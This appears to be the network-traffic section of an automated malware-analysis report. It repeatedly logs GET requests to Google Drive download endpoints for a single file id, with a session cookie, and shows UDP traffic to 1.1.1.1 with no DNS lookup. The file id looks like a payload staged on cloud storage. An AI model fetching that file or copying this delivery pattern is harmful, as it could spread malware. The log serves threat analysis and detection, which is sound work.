Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
